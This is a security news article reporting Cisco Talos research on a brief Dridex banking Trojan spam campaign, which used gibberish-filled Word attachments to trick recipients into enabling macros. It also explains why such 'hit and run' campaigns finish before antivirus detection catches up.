14 DAY TRIAL // A new variant of the Dridex banking Trojan has been identified in a recent “hit and run” spam campaign that spread the malware via macro scripts in Word documents with incomprehensible content.
The short-lived operation lasted for less than five hours, sufficient to make plenty of victims before antivirus solutions set up protection measures.
Sneaky macros add malware in the background
Additional evasion tactics employed by the cybercriminals included unique subject lines for the nefarious emails and the fact that they relied on different names for the malicious Word file delivered.
Security researchers at Cisco’s Talos research group noticed that recycling the file name occurred in less than 5% of the cases.
The investigation revealed that two types of emails were sent, both containing Word files with embedded macros that pointed to Dridex download. However, one of them was peculiar, as the message body had no content, and provided only the attachment.
Upon opening the text file, the victim would see text characters that made no sense. Such a technique is used to trick the potential victim into enabling macro support, and thus enable the malware download.
By default, macro scripts are turned off in Microsoft Office components, since the feature has been abused in the past for malware delivery. Anyone needing macros (simple scripts that carry out repetitive tasks) in their work can have them enabled, but not before seeing an alert about the potential risk of the action.
Cybercriminals purposely add the scrambled text in the document and inform the recipient that incorrect viewing of the information is due to macros being disabled.
Once the script becomes active, it relies on PowerShell to download and execute Dridex from a hard-coded IP address.
Short operations end before detection is created
In the second malicious email seen by the researchers, text is available in the body, and it purports to be financial information, pointing the recipient to the attachment to check the invoice.
The content in the document is also unintelligible, and if macros are enabled, the same routine leading to the download of Dridex banking is followed.
Detection for the Word documents was poor at the beginning, and it improved later on, covering only the last part of the campaign.
Talos threat researcher Nick Biasini says in a blog post on Monday that many of the short-lived cybercriminal operations often fly under the radar of antivirus solutions because detection is introduced after they are completed.
In an example he provided, a variant of Dridex was distributed for 9.1 hours before security solutions could take a stance. However, the peak of the campaign lasted for only three hours, some five hours before antivirus could identify the new malware string.
